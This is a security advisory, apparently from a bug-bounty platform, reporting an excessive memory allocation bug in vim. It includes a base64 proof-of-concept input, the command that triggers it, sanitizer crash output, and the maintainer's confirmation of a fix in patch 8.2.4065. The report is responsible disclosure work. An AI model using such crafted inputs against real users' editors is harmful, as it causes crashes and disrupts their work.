Allocation of Resources Without Limits or Throttling in vim/vim

Valid

Reported on

Jan 10th 2022


Description

Memory Allocation with Excessive Size Value

Proof of Concept

base64 poc
aAp2ewp5Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3NzcKXQo=
vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
==1206187==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8 (0x7f8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x49626d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49626d)
    #1 0x4c5d75  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d75)
We are processing your report and will contact the vim team within 24 hours. 16 days ago
We have contacted a member of the vim team and are waiting to hear back 15 days ago
Bram Moolenaar validated this vulnerability 15 days ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
15 days ago

Maintainer


I can reproduce the problem. It would cause the allocation to fail, I don't see any other side effect. I can solve it anyway.

Bram Moolenaar
15 days ago

Maintainer


Fixed by patch 8.2.4065, which adds a simple test based on the POC.

Bram Moolenaar confirmed that a fix has been merged on 3cf21b 15 days ago
Bram Moolenaar has been awarded the fix bounty